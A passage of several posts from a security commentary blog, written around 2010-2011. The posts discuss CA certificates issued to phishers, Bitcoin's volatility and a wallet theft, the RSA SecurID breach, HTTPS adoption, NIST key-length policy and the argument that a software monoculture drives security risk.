    This protection is (a) ineffective against phishing, which is shown frequently every time a phisher downgrades the HTTPS to HTTP, (b) now shared & available equally with phishers themselves to assist them in their crime, and who now apparently feel that (c) the protection offered in encryption against their enemies outweighs the legal threat of some identity being revealed to their enemies. Users lose.

    In open list on Mozilla's forum, the CA concerned saw no reason to address the situation. Other CAs also seem to issue to equally dodgy sites, so it's not about one CA. The general feeling in the CA-dominated sector is that identity within the cert is sufficient reason to establish a reasonable security protection, notwithstanding that history, logic, evidence and now the phishers themselves show such a claim is about as reasonable and efficacious as selling recipes for marinated babies.

    It seems Peter and I stand alone. In some exasperation, I consulted with Mozilla directly. To little end; Mozilla also believe that the phishing community are deserving of certificates, they simply have to ask a CA to be invited into our trusted inner-nursery. I've no doubt that the other vendors will believe and maintain the same, an approach to legal issues sometimes known as the ostrich strategy. The only difference here being that Mozilla maintains an open forum, so it can be embarrassed into a private response, whereas CAs and other vendors can be embarrassed into silence.

    Posted by iang at 06:13 PM | Comments (0) | TrackBack

    June 14, 2011

    BitCoin - the bad news

    Predictions based on theory have been presented. Not good. BitCoin will fundamentally be a bad money because it will be too volatile, according to the laws of economics. You can't price goods in a volatile unit. Rated for speculation only, bubble territory, and quite reasonably likened to a ponzi scheme (if not exactly a ponzi scheme, with a nod to Patrick). Sorry folks, the laws of economics know no bribes, favours, demands.

    And so theory comes to practice:

    Bitcoin slump follows senators’ threats - Correlation or causation?

    By Richard Chirgwin.

    As any investment adviser will tell you, it’s a bad idea to put all your eggs in one basket. And if Rick Falkvinge was telling the truth when he said all his savings were now in Bitcoin, he’s been taken down by a third in a day.

    Following last week’s call by US senators for an investigation into virtual crypto-currency Bitcoin, its value is slumping.

    According to DailyTech, Bitcoins last Friday suffered more than 30 percent depreciation in value – a considerable fall given that the currency’s architecture is designed to inflate its value over time.

    The slump could reflect a change in attitude among holders of Bitcoins: if the currency were to become less attractive to pay for illegal drugs, then dealers and their customers would dump their Bitcoins in favour of some other medium.

    Being dumped by PayPal won’t have helped either. As DailyTech pointed out, PayPal has a policy against virtual currencies, so by enforcing the policy, PayPal has made it harder to trade Bitcoins.

    The threat of regulation may also have sent shivers down Bitcoin-holders’ spines. The easiest regulatory action – although requiring international cooperation – would be to regulate, shut down or tax Bitcoin exchanges such as the now-famous Mt Gox. However, a sufficient slump may well have the same effect as a crackdown: whether Mt Gox is a single speculator or a group of traders, it’s unlikely to have the kind of backing (or even, perhaps, the hedging) that enables “real” currency traders to survive sharp swings in value.
    ......

    Then the problem of a bubble in digital cash is compounded by theft:


    I just got hacked - any help is welcome!

    Hi everyone. I am totally devastated today. I just woke up to see a very large chunk of my bitcoin balance gone to the following address:

    1KPTdMb6p7H3YCwsyFqrEmKGmsHqe1Q3jg

    Transaction date: 6/13/2011 12:52 (EST)

    I feel like killing myself now. This get me so f'ing pissed off. If only the wallet file was encrypted on the HD. I do feel like this is my fault somehow for now moving that money to a separate non windows computer. I backed up my wallet.dat file religiously and encrypted it but that does not do me much good when someone or some trojan or something has direct access to my computer somehow.

    The dude lost 25,000 BTC which at recent "valuations" on the exchange I calculate as $250,000 to $750,000.

    Yeah. When we were building digital cash systems we were *very conscious* that the weak link in the entire process was the user's PC. We did two things: we chose nymous, directly accounted transactions, so that we could freeze the whole thing if we needed to, and we (intended) to go for secure platforms for large values. Those secure platforms are now cheaply available (they weren't then).

    BitCoin went too fast. Now people are learning the lessons.

    (Note the above link is no longer working. Luckily I had it cached. I'm not attesting to its accuracy, just its relevance to the debate.)


    Also:For those who can stomach more bad news...
    1. Bitcoin and tulip bulbs
    2. Is BitCoin a triple entry system?
    3. BitCoin - the bad news

    Posted by iang at 10:51 AM | Comments (1) | TrackBack

    June 07, 2011

    RSA Pawned - Black Queen runs amoc behind US lines of defence

    What to learn from the RSA SecureID breach?

    RSA has finally admitted publicly that the March breach into its systems has resulted in the compromise of their SecurID two-factor authentication tokens.

    Which points to:

    In a letter to customers Monday, the EMC Corp. unit openly acknowledged for the first time that intruders had breached its security systems at defense contractor Lockheed Martin Corp. using data stolen from RSA.

    It's a targetted attack across multiple avenues. This is a big shift in the attack profile, and it is perhaps the first serious evidence of the concept of Advanced Persistent Threats (APTs).

    What went wrong at the institutional level? Perhaps something like this:

    • A low-threat environment in the 1990s
    • led to success of low-threat SecureId token
    • (based on non-diversified model that sourced back to a single company),
    • which peace in our time translated to lack of desire to evolve in 2000s,
    • and the industry grew to love "best practices with a vengeance" as everyone from finance to defence relied on the same approach.
    • and domination in secure tokens by one brand-name supplier.
    • Meanwhile, we watched the evolution of attack scenarios, rolling on through the phishing and breaches pincer movement of the early 200s up to APTs to now,
    • while any thought & leadership in the security industry withered and died.

    So, with a breach in the single-point-of-failure, we are looking at an industry-wide replacement of all 40 million SecureId tokens.

    Which presumably will be a fascinating exercise, and one from which we should be able to learn a lot. It isn't often that we see a SPOF event, and it's a chance to learn just what impact a single point of failure has:

    The admission comes in the wake of cyber intrusions into the networks of three US military contractors: Lockheed Martin, L-3 Communications and Northrop Grumman - one of them confirmed by the company, others hinted at by internal warnings and an unusual domain name and password reset process

    But one would also be somewhat irresponsible to not ask what happens next? Simply replacing the SecureID fobs and resetting the secret sauce at RSA does not seem to satisfy as *a solution*, although we can understand that a short term hack might be needed.

    Chief (Information) Security Officers everywhere will probably be thinking that we need a little more re-thinking of the old 1990s models. Good luck, guys! You'll probably need a few more breaches to wake up the CEOs, so you can get the backing you need to go beyond "best practices" and start doing the job seriously.


    In contrast, the very next post discusses where we're at when we fail to meet "best practices!"

    Posted by iang at 11:45 AM | Comments (4) | TrackBack

    May 20, 2011

    Hold the press! Corporates say that SSL is too slow to be used all the time?

    Google researchers say they've devised a way to significantly reduce the time it takes websites to establish encrypted connections with end-user browsers, a breakthrough that could make it less painful for many services to offer the security feature. ....

    The finding should come as welcome news to those concerned about online privacy. With the notable exceptions of Twitter, Facebook, and a handful of Google services, many websites send the vast majority of traffic over unencrypted channels, making it easy for governments, administrators, and Wi-Fi hotspot providers to snoop or even modify potentially sensitive communications while in transit. Companies such as eBay have said it's too costly to offer always-on encryption.

    The Firesheep extension introduced last year for the Firefox browser drove home just how menacing the risk of unencrypted websites can be.

    Is this a case of, NIST taketh away what Google granteth?

    Posted by iang at 12:25 PM | Comments (3) | TrackBack

    March 30, 2011

    Revising Top Tip #2 - Use another browser!

    It's been a long time since I wrote up my Security Top Tips, and things have changed a bit since then. Here's an update. (You can see the top tips about half way down on the right menu block of the front page.)

    Since then, browsing threats have got a fair bit worse. Although browsers have done some work to improve things, their overall efforts have not really resulted in any impact on the threats. Worse, we are now seeing MITBs being experimented with, and many more attackers get in on the act.

    To cope with this heightened risk to our personal node, I experimented a lot with using private browsing, cache clearing, separate accounts and so forth, and finally hit on a fairly easy method: Use another browser.

    That is, use something other than the browser that one uses for browsing. I use Firefox for general stuff, and for a long time I've been worried that it doesn't really do enough in the battle for my user security. Safari is also loaded on my machine (thanks to Top Tip #1). I don't really like using it, as its interface is a little bit weaker than Firefox (especially the SSL visibility) ... but in this role it does very well.

    So for some time now, for all my online banking and similar usage, I have been using Safari. These are my actions:

    • I start Safari up
    • click on Safari / Private Browsing
    • use google or memory to find the bank
    • inspect the URL and head in.
    • After my banking session I shut down Safari.

    I don't use bookmarks, because that's an easy place for an trojan to look (I'm not entirely sure of that technique but it seems like an obvious hint).

    "Use another browser" creates an ideal barrier between a browsing browser and a security browser, and Safari works pretty well in that role. It's like an air gap, or an app gap, if you like. If you are on Microsoft, you could do the same thing using IE and Firefox, or you could download Chrome.

    I've also tested it on my family ... and it is by far the easiest thing to tell them. They get it! Assume your browsing habits are risky, and don't infect your banking. This works well because my family share their computers with kids, and the kids have all been instructed not to use Safari. They get it too! They don't follow the logic, but they do follow the tool name.

    What says the popular vote? Try it and let me know. I'd be interested to hear of any cross-browser threats, as well :)


    A couple of footnotes: Firsly, belated apologies to anyone who's been tricked by the old Top Tip for taking so long to write this one up. Secondly, I've dropped the Petnames / Trustbar Top Tip because it isn't really suitable for the mass users (e.g., my mother) and these fine security tools never really attracted the attention of the browser-powers-that-be, so they died away as hobby efforts tend to do. Maybe the replacement would be "Turn on Private Browsing?"

    Posted by iang at 01:54 AM | Comments (8) | TrackBack

    March 04, 2011

    more on HTTPS everywhere -- US Senator writes to websites?!

    Normally I'd worry when a representative of the US people asked sites to adopt more security ... but here goes:

    Senator Charles Schumer is calling on major websites in the United States to make their pages more secure to protect those connecting from Wi-Fi hotspots, various media outlets are reporting.

    In a letter sent to Amazon, Twitter, Yahoo, and others, the Senator, a Democrat representing New York, asked the websites to switch to more secure HTTPS pages in order to help prevent people accessing the Internet from public connections in places like restaurants and bookstores from being targeted by hackers and identity thieves.

    "As the operator of one of the world's most popular websites, you provide a valuable service to Internet users across America," Schumer wrote, according to Tony Bradley of PCWorld. "With the privilege of serving millions of U.S. citizens, however, comes the responsibility to protect them while they are on your site."

    "Free Wi-Fi networks provide hackers, identity thieves and spammers alike with a smorgasbord of opportunities to steal private user information like passwords, usernames, and credit card information," the Senator added. "The quickest and easiest way to shut down this one-stop shop for identity theft is for major websites to switch to secure HTTPS web addresses instead of the less secure HTTP protocol, which has become a welcome mat for would be hackers."

    According to a Reuters report on Sunday, Schumer also called standard HTTP protocol "a welcome mat for would-be hackers" and said that programs were available that made hacking into another person's computer and swiping private information--unless secure protocol was used.

    ...

    In this case, it's an overall plus. HTTPS everywhere, please!

    This is one way in which we can stop a lot of trouble. Somewhat depressing that it has taken this long to filter through, but with friends like NIST, one shouldn't be overly surprised if the golden goose of HTTPS security is cooked to a cinder beforehand.

    Posted by iang at 02:36 AM | Comments (3) | TrackBack

    November 15, 2010

    The Great Cyberheist

    The biggest this and the bestest that is mostly a waste of time, but once a year it is good to see just how big some of the numbers are. Jim sent in this NY Times article by James Verini, just to show that breaches cost serious money:

    According to Attorney General Eric Holder, who last month presented an award to Peretti and the prosecutors and Secret Service agents who brought Gonzalez down, Gonzalez cost TJX, Heartland and the other victimized companies more than $400 million in reimbursements and forensic and legal fees. At last count, at least 500 banks were affected by the Heartland breach.

    $400 million costs caused by one small group, or one attacker, and those costs aren't complete or known as yet.

    But the extent of the damage is unknown. “The majority of the stuff I hacked was never brought into public light,” Toey told me. One of the imprisoned hackers told me there “were major chains and big hacks that would dwarf TJX. I’m just waiting for them to indict us for the rest of them.” Online fraud is still rampant in the United States, but statistics show a major drop in 2009 from previous years, when Gonzalez was active.

    What to make of this? It may well be that one single guy / group caused the lion's share of the breach fraud we saw in the wake of SB1386. Do we breathe a sigh of relief that he's gone for good (20 years?) ... or do we wonder at the basic nature of the attacks used to get in?

    The attacks were fairly well described in the article. They were all through apparently PCE compliance-complete institutions. Lots of them. They start from the ho-hum of breaching the secured perimeter through WiFi, right up to the slightly yawnsome SQL injection.

    Here's my bet: the ease of this overall approach and the lack of real good security alternatives (firewalls & SSL, anyone?) means there will be a pause, and then the professionals will move in. And they won't be caught, because they'll move faster than the Feds. Gonzalez was a static target, he wasn't leaving the country. The new professionals will know their OODA.

    Read the entire article, and make your own bet :)

    Posted by iang at 04:51 AM | Comments (0) | TrackBack

    October 24, 2010

    perception versus action, when should Apple act?

    Clive throws some security complaints against Apple in comments. He's got a point, but what is that point, exactly? The issues raised have little to do with Apple, per se, as they are all generic and familiar in some sense.

    Aside from the futility of trying to damage Apple's teflon brand, I guess, for me at least the issue here is when & if the perception, costs and activities of Apple's security begin to cross.

    We saw this with Microsoft. Throughout the 1990s, they made hay, the sun shone. Security wasn't an issue, the users lapped it all up, paid the cost, asked for more.

    So Microsoft did the "right thing" by their shareholders and ignored it. Having seen how much money they made for their shareholders in those days, it is hard to argue they did the "wrong thing". Indeed, this is what I tried to establish in that counter-cultural rant called GP -- that there is an economic rationale to delaying security until we can identify a real enemy.

    Early 2000s, the scene started to change. We saw the first signs of phishing in 2001 (if we were watching) and the rising tide of costs to users was starting to feedback into Microsoft's top slot. Hence Bill Gate's famous "I want to spend another dime and spin the company" memo in January 2002 followed by his declaration that "phishing is our problem, not the user's fault."

    But it didn't work. Even though we saw a massive internal change, and lots more attention on security, the Vista thing didn't work out. And the titanic of Microsoft perception slowly inched itself up onto an iceberg and spent half a decade sliding under the waters.

    For Microsoft, action started in 2002, and changed the company somewhat. By the mid 2000s, activity on security was impressive. But perception was already underwater, irreversibly sinking.

    Now we're all looking at Apple. *Only* because they have a bigger market cap than Microsoft. Note that this blog has promoted Macs for a better security experience for many years, and anyone who took that advice won big-time. But now the media has swung it's lazer-sharp eyeballs across to look at the one that snuck below their impenetrable radar and cheekily stole the crown of publicity from Microsoft. The game's up, the media tell us!

    I speak in jest of course; market perception is what the users think, not what the media says [1]. Possibly we will see market perception of Apple's security begin to diminish, as user costs begin to rise. The user-cost argument is still solidly profitable on the Mac's balance sheet, so that'll take some time. Meanwhile, there is little sign that Apple themselves are acting within to improve their impending security nightmare [2].

    The interesting question for the long term, for the business-minded, is when should Apple begin to act? And how?


    [1] Watching the media for security perception shifts is like relying on astrology for stock market picks. Using one belief system to answer the question of another belief system is only advisable for hobbyists with time on their hands and money to lose.

    [2] just as a postscript, this question is made all the more interesting because, unlike Microsoft, Apple never signals its intentions in advance. And after the move, the script is so well stage-managed that we can't rely on it. So we may never know the answer. Which makes the job of investor in Apple quite a ... perceptionally challenging one :)

    Posted by iang at 01:30 AM | Comments (1) | TrackBack

    October 05, 2010

    Cryptographic Numerology - our number is up

    Chit-chat around the coffeerooms of crypto-plumbers is disturbed by NIST's campaign to have all the CAs switch up to 2048 bit roots:

    On 30/09/10 5:17 PM, Kevin W. Wall wrote:
    > Thor Lancelot Simon wrote:
    > See below, which includes a handy pointer to the Microsoft and Mozilla policy statements "requiring" CAs to cease signing anything shorter than 2048 bits.
    <...snip...>
    > These certificates (the end-site ones) have lifetimes of about 3 years maximum. Who here thinks 1280 bit keys will be factored by 2014? *Sigh*.
    No one that I know of (unless the NSA folks are hiding their quantum computers from us :). But you can blame this one on NIST, not Microsoft or Mozilla. They are pushing the CAs to make this happen and I think 2014 is one of the important cutoff dates, such as the date that the CAs have to stop issuing certs with 1024-bit keys.

    I can dig up the NIST URL once I get back to work, assuming anyone actually cares.


    The world of cryptology has always been plagued by numerology.

    Not so much in the tearooms of the pure mathematicians, but all other areas: programming, management, provisioning, etc. It is I think a desperation in the un-endowed to understand something, anything of the topic.

    E.g., I might have no clue how RSA works but I can understand that 2048 has to be twice as good as 1024, right? When I hear it is even better than twice, I'm overjoyed!

    This desperation to be able to talk about it is partly due to having to be part of the business (write some code, buy a cert, make a security decision, sell a product) and partly a sense of helplessness when faced with apparently expert and confident advice. It's not an unfounded fear; experts use their familiarity with the concepts to also peddle other things which are frequently bogus or hopeful or self-serving, so the ignorance leads to bad choices being made.

    Those that aren't in the know are powerless, and shown to be powerless.

    When something simple comes along and fills that void people grasp onto them and won't let go. Like numbers. As long as they can compare 1024 to 2048, they have a safety blanket that allows them to ignore all the other words. As long as I can do my due diligence as a manager (ensure that all my keys are 2048) I'm golden. I've done my part, prove me wrong! Now do your part!


    This is a very interesting problem [1]. Cryptographic numerology diverts attention from the difficult to the trivial. A similar effect happens with absolute security, which we might call "divine cryptography." Managers become obsessed with perfection in one thing, to the extent that they will ignore flaws in another thing. Also, standards, which we might call "beliefs cryptography" for their ability to construct a paper cathedral within which there is room for us all, and our flock, to pray safely inside.

    We know divinity doesn't exist, but people demand it. We know that religions war all the time, and those within a religion will discriminate against others, to the loss of us all. We know all this, but we don't; cognitive dissonance makes us so much happier, it should be a drug.


    It was into this desperate aching void that the seminal paper by Lenstra and Verheul stepped in to put a framework on the numbers [2]. On the surface, it solved the problem of cross-domain number comparison, e.g., 512 bit RSA compared to 256 bit AES, which had always confused the managers. And to be fair, this observation was a long time coming in the cryptographic world, too, which makes L&V's paper a milestone.

    Cryptographic Numerology's star has been on the ascent ever since that paper: As well as solving the cipher-public-key-hash numeric comparison trap, numerology is now graced with academic respectability.

    This made it irresistible to large institutions which are required to keep their facade of advice up. NIST like all the other agencies followed, but NIST has a couple of powerful forces on it. Firstly, NIST is slightly special, in ways that other agencies represented in keylength.com only wish to be special. NIST, as pushed by the NSA, is protecting primarily US government resources:

    This document has been developed by the National Institute of Standards and Technology (NIST) in furtherance of its statutory responsibilities under the Federal Information Security Management Act (FISMA) of 2002, Public Law 107-347. NIST is responsible for developing standards and guidelines, including minimum requirements, for providing adequate information security for all agency operations and assets, but such standards and guidelines shall not apply to national security systems.

    That's US not us. It's not even protecting USA industry. NIST is explicitly targetted by law to protect the various multitude of government agencies that make up the beast we know as the Government of the United States of America. That gives it unquestionable credibility.

    And, as has been noticed a few times, Mars is on the ascendancy: *Cyberwarfare* is the second special force. Whatever one thinks of the mess called cyberwarfare (equity disaster, stuxnet, cryptographic astrology, etc) we can probably agree, if anyone bad is thinking in terms of cracking 1024 bit keys, then they'll be likely another nation-state interested in taking aim against the USG agencies. c.f., stuxnet, which is emerging as a state v. state adventure. USG, or one of USG's opposing states, are probably the leading place on the planet that would face a serious 1024 bit threat if one were to emerge.

    Hence, NIST is plausibly right in imposing 2048-bit RSA keys into its security model. And they are not bad in the work they do, for their client [3]. Numerology and astrology are in alignment today, if your client is from Washington DC.

    However, real or fantastical, this is a threat model that simply doesn't apply to the rest of the world. The sad sad fact is that NIST's threat model belongs to them, to US, not to us. We all adopting the NIST security model is like a Taurus following the advice in the Aries section of today's paper. It's not right, however wise it sounds. And if applied without thought, it may reduce our security not improve it:


    Writes Thor:
    > At 1024 bits, it is not. But you are looking
    > at a factor of *9* increase in computational
    > cost when you go immediately to 2048 bits. At
    > that point, the bottleneck for many applications
    > shifts, particularly those ...
    > Also,...
    > ...and suddenly...
    >
    > This too will hinder the deployment of "SSL everywhere",...

    When US industry follows NIST, and when worldwide industry follows US industry, and when open source Internet follows industry, we have a classic text-book case of adopting someone else's threat, security and business models without knowing it.

    Keep in mind, our threat model doesn't include crunching 1024s. At all, any time, nobody's ever bothered to crunch 512 in anger, against the commercial or private world. So we're pretty darn safe at 1024. But our threat model does include

    *attacks on poor security user interfaces in online banking*

    That's a clear and present danger. And one of the key, silent, killer causes of that is the sheer rarity of HTTPS. If we can move the industry to "HTTPS everywhere" then we can make a significant different. To our security.

    On the other hand, we can shift to 2048, kill the move to "HTTPS everywhere", and save the US Government from losing sleep over the cyberwarfare it created for itself (c.f., the equity failure).

    And that's what's going to happen. Cryptographic Numerology is on a roll, NIST's dice are loaded, our number is up. We have breached the law of unintended consequences, and we are going to be reducing the security of the Internet because of it. Thanks, NIST! Thanks, Mozilla, thanks, Microsoft.



    [1] As well as this area, others have looked at how to make the bounty of cryptography more safely available to non-cognicenti. I especially push the aphorisms of Adi Shamir and Kerckhoffs. And, add my own meagre efforts in Hypotheses and Pareto-secure.

    [2] For detailed work and references on Lenstra & Verheul's paper, see http://www.keylength.com/ which includes calculators of many of the various efforts. It's a good paper. They can't be criticised for it in the terms in this post, it's the law of unintended consequences again.

    [3] Also, other work by NIST to standardise the PRNG (psuedo-random-number-generator) has to be applauded. The subtlety of what they have done is only becoming apparent after much argumentation: they've unravelled the unprovable entropy problem by unplugging it from the equation.

    But they've gone a step further than the earlier leading work by Ferguson and Schneier and the various quiet cryptoplumbers, by turning the PRNG into a deterministic algorithm. Indeed, we can now see something special: NIST has turned the PRNG into a reverse-cycle message digest. Entropy is now the MD's document, and the psuedo-randomness is the cryptographically-secure hash that spills out of the algorithm.

    Hey Presto! The PRNG is now the black box that provides the one-way expansion of the document. It's not the reverse-cycle air conditioning of the message digest that is exciting here, it's the fact that it is now a new class of algorithms. It can be specified, paramaterised, and most importantly for cryptographic algorithms, given test data to prove the coding is correct.

    (I use the term reverse-cycle in the sense of air-conditioning. I should also stress that this work took several generations to get to where it is today; including private efforts by many programmers to make sense of PRNGs and entropy by creating various application designs, and a couple of papers by Ferguson and Schneier. But it is the black-boxification by NIST that took the critical step that I'm lauding today.)

    Posted by iang at 10:55 AM | Comments (1) | TrackBack

    August 24, 2010

    What would the auditor say to this?

    Iran's Bushehr nuclear power plant in Bushehr Port:

    "An error is seen on a computer screen of Bushehr nuclear power plant's map in the Bushehr Port on the Persian Gulf, 1,000 kms south of Tehran, Iran on February 25, 2009. Iranian officials said the long-awaited power plant was expected to become operational last fall but its construction was plagued by several setbacks, including difficulties in procuring its remaining equipment and the necessary uranium fuel. (UPI Photo/Mohammad Kheirkhah)"

    Click onwards for full sized image:

    Compliant? Minor problem? Slight discordance? Conspiracy theory?

    (spotted by Steve Bellovin)

    Posted by iang at 05:53 AM | Comments (2) | TrackBack

    August 12, 2010

    memes in infosec II - War! Infosec is WAR!

    Another metaphor (I) that has gained popularity is that Infosec security is much like war. There are some reasons for this: there is an aggressive attacker out there who is trying to defeat you. Which tends to muck a lot of statistical error-based thinking in IT, a lot of business process, and as well, most economic models (e.g., asymmetric information assumes a simple two-party model). Another reason is the current beltway push for essential cyberwarfare divisional budget, although I'd hasten to say that this is not a good reason, just a reason. Which is to say, it's all blather, FUD, and oneupsmanship against the Chinese, same as it ever was with Eisenhower's nemesis.

    Having said that, infosec isn't like war in many ways. And knowing when and why and how is not a trivial thing. So, drawing from military writings is not without dangers. Consider these laments about applying Sun Tzu's The Art of War to infosec from Steve Tornio and Brian Martin:

    In "The Art of War," Sun Tzu's writing addressed a variety of military tactics, very few of which can truly be extrapolated into modern InfoSec practices. The parts that do apply aren't terribly groundbreaking and may actually conflict with other tenets when artificially applied to InfoSec. Rather than accept that Tzu's work is not relevant to modern day Infosec, people tend to force analogies and stretch comparisons to his work. These big leaps are professionals whoring themselves just to get in what seems like a cool reference and wise quote.

    "The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable." - The Art of War

    The Art of SunTzu is not a literal quoting and thence mad rush to build the tool. Art of War was written from the context of a successful general talking to another hopeful general on the general topic of building an army for a set piece nation-to-nation confrontation. It was also very short.

    Art of War tends to interlace high level principles with low level examples, and dance very quickly through most of its lessons. Hence it was very easy to misinterpret, and equally easy to "whore oneself for a cool & wise quote."

    However, Sun Tzu still stands tall in the face of such disrespect, as it says things like know yourself FIRST, and know the enemy SECOND, which the above essay actually agreed with. And, as if it needs to be said, knowing the enemy does not imply knowing their names, locations, genders, and proclivities:

    Do you know your enemy? If you answer 'yes' to that question, you already lost the battle and the war. If you know some of your enemies, you are well on your way to understanding why Tzu's teachings haven't been relevant to InfoSec for over two decades. Do you want to know your enemy? Fine, here you go. your enemy may be any or all of the following:

    • 12 y/o student in Ohio learning computers in middle school
    • 13 y/o home-schooled girl getting bored with social networks
    • 15 y/o kid in Brazil that joined a defacement group
    • ...

    Of course, Sun Tzu also didn't know the sordid details of every soldier's desires; "knowing" isn't biblical, it's capable. Or, knowing their capabilities, and that can be done, we call it risk management. As Jeffrey Carr said:

    The reason why you don't know how to assign or even begin to think about attribution is because you are too consumed by the minutia of your profession. ... The only reason why some (OK, many) InfoSec engineers haven't put 2+2 together is that their entire industry has been built around providing automated solutions at the microcosmic level. When that's all you've got, you're right - you'll never be able to claim victory.

    Right. Most all InfoSec engineers are hired to protect existing installations. The solution is almost always boxed into the defensive, siege mentality described above, because the alternate, as Dan Geer apparently said:

    When you are losing a game that you cannot afford to lose, change the rules. The central rule today has been to have a shield for every arrow. But you can't carry enough shields and you can run faster with fewer anyhow.

    The advanced persistent threat, which is to say the offense that enjoys a permanent advantage and is already funding its R&D out of revenue, will win as long as you try to block what he does. You have to change the rules. You have to block his success from even being possible, not exchange volleys of ever better tools designed in response to his. You have to concentrate on outcomes, you have to pre-empt, you have to be your own intelligence agency, you have to instrument your enterprise, you have to instrument your data.

    But, at a corporate level, that's simply not allowed. Great ideas, but only the achievable strategy is useful, the rest is fantasy. You can't walk into any company or government department and change the rules of infosec -- that means rebuilding the apps. You can't even get any institution to agree that their apps are insecure; or, you can get silent agreement by embarrassing them in the press, along with being fired!

    I speak from pretty good experience of building secure apps, and of looking at other institutional or enterprise apps and packages. The difference is huge. It's the difference between defeating Japan and defeating Vietnam. One was a decision of maximisation, the other of minimisation. It's the difference between engineering and marketing; one is solid physics, the other is facade, faith, FUD, bribes.

    It's the difference between setting up a world-beating sigint division, and fixing your own sigsec. The first is a science, and responds well by adding money and people. Think Manhattan, Bletchley Park. The second is a societal norm, and responds only to methods generally classed by the defenders as crimes against humanity and applications. Slavery, colonialism, discrimination, the great firewall of China, if you really believe in stopping these things, then you are heading for war with your own people.

    Which might all lead the grumpy anti-Sun Tzu crowd to say, "told you so! This war is unwinnable." Well, not quite. The trick is to decide what winning is; to impose your will on the battleground. This is indeed what strategy is, to impose ones own definition of the battleground on the enemy, and be right about it, which is partly what Dan Geer is getting at when he says "change the rules." A more nuanced view would be: to set the rules that win for you; and to make them the rules you play by.

    And, this is pretty easily answered: for a company, winning means profits. As long as your company can conduct its strategy in the face of affordable losses, then it's winning. Think credit cards, which sacrifice a few hundred basis points for the greater good. It really doesn't matter how much of a loss is made, as long as the customer pays for it and leaves a healthy profit over.

    Relevance to Sun Tzu? The parable of the Emperor's Concubines!

    In summary, it is fair to say that Sun Tzu is one of those texts that are easy to bandy around, but rather hard to interpret. Same as infosec, really, so it is no surprise we see it in that world. Also, war as a very complicated business, and Art of War was really written for that messy discipline ... so it takes somewhat more than a familiarity from both to successfully relate across beyond a simple metaphor level.

    And, as we know, metaphors and analogues are descriptive tools, not proofs. Proving them wrong proves nothing more than you're now at least an adolescent.

    Finally, even war isn't much like war these days. If one factors in the last decade, there is a clear pattern of unilateral decisions, casus belli at a price, futile targets, and effervescent gains. Indeed, infosec looks more like the low intensity, mission-shy wars in the Eastern theaters than either of them look like Sun Tzu's campaigns.

    memes in infosec I - Eve and Mallory are missing, presumed dead

    Posted by iang at 04:34 PM | Comments (1) | TrackBack

    August 11, 2010

    Hacking the Apple, when where how... and whether we care why?

    One of the things that has been pretty much standard in infosec is that the risks earnt (costs incurred!) from owning a Mac have been dramatically lower. I do it, and save, and so do a lot of my peers & friends. I don't collect stats, but here's a comment from Dan Geer from 2005:

    Amongst the cognoscenti, you can see this: at security conferences of all sorts you’ll find perhaps 30% of the assembled laptops are Mac OS X, and of the remaining Intel boxes, perhaps 50% (or 35% overall) are Linux variants. In other words, while security conferences are bad places to use a password in the clear monoculture on the back of the envelope over a wireless channel, there is approximately zero chance of cascade failure amongst the participants.

    I recommend it on the blog front page as the number 1 security tip of all:

    #1 buy a mac.

    Why this is the case is of course a really interesting question. Is it because Macs are inherently more secure, in themselves? The answer seems to be No, not in themselves. We've seen enough evidence to suggest, at an anecdotal level, that when put into a fair fight, the Macs don't do any better than the competition. (Sometimes they do worse, and the competition ensures those results are broadcast widely :)

    However it is still the case that the while the security in the Macs aren't great, the result for the user is better -- the costs resulting from breaches, installs, virus slow-downs, etc, remain lower [1]. Which would imply the threats are lower, recalling the old mantra of:

    Business model ⇒ threat model ⇒ security model

    Now, why is the threat (model) lower? It isn't because the attackers are fans. They generally want money, and money is neutral.

    One theory that might explain it is the notion of monoculture.

    This idea was captured a while back by Dan Geer and friends in a paper that claimed that the notion of Microsoft's dominance threated the national security of the USA. It certainly threatened someone, as Dan lost his job the day the paper was released [2].

    In brief, monoculture argues that when one platform gains an ascendency to dominate the market, then we enter a situation of particular vulnerability to that platform. It becomes efficient for all economically-motivated attackers to concentrate their efforts on that one dominant platform and ignore the rest.

    In a sense, this is an application of the Religion v. Darwin argument to computer security. Darwin argued that diversity was good for the species as a whole, because singular threats would wipe out singular species. The monoculture critique can also be seen as analogous to Capitalism v. Communism, where the former advances through creative destruction, and the latter stagnates through despotic ignorance.

    A lot of us (including me) looked at the monoculture argument and thought it ... simplistic and hopeful. Yet, the idea hangs on ... so the question shifts for us slower skeptics to how to prove it [3]?

    Apple is quietly wrestling with a security conundrum. How the company handles it could dictate the pace at which cybercriminals accelerate attacks on iPhones and iPads.

    Apple is hustling to issue a patch for a milestone security flaw that makes it possible to remotely hack - or jailbreak - iOS, the operating system for iPhones, iPads and iPod Touch.

    Apple's new problem is perhaps early signs of good evidence that the theory is good. Here we have Apple struggling with hacks on its mobile platform (iPads, iPods, iPhones) and facing a threat which it seemingly hasn't faced on the Macs [4].

    The differentiating factor -- other than the tech stuff -- is that Apple is leading in the mobile market.

    IPhones, in particular, have become a pop culture icon in the U.S., and now the iPad has grabbed the spotlight. "The more popular these devices become, the more likely they are to get the attention of attackers," says Joshua Talbot, intelligence manager at Symantec Security Response.

    Not dominating like Microsoft used to enjoy, but presenting enough of a nose above the pulpit to get a shot taken. Meanwhile, Macs remain stubbornly stuck at a reported 5% of market share in the computer field, regardless of the security advice [5]. And nothing much happens to them.

    If market leadership continues to accrue to Apple in the iP* mobile sector, as the market expect it does, and if security woes continue as well, I'd count that as good evidence [6].


    [1] #1 security tip remains good: buy a Mac, not because of the security but because of the threats. Smart users don't care so much why, they just want to benefit this year, this decade, while they can.

    [2] Perhaps because Dan lost his job, he gets fuller attention. The full cite would be like: Daniel Geer, Rebecca Bace, Peter Gutmann, Perry Metzger, Charles P. Pfleeger, John S. Quarterman, Bruce Schneier, "CyberInsecurity: The Cost of Monopoly How the Dominance of Microsoft's Products Poses a Risk to Security." Preserved by the inestimable cryptome.org, a forerunner of the now infamous wikileaks.org.

    [3] Proof in the sense of scientific method is not possible, because we can't run the experiment. This is economics, not science, we can't run the experiment like real scientists. What we have to do is perhaps psuedo-scientific-method; we predict, we wait, and we observe.

    [4] On the other hand, maybe the party is about to end for Macs. News just in:

    Security vendor M86 Security says it's discovered that a U.K.-based bank has suffered almost $900,000 (675,000 Euros) in fraudulent bank-funds transfers due to the ZeuS Trojan malware that has been targeting the institution.

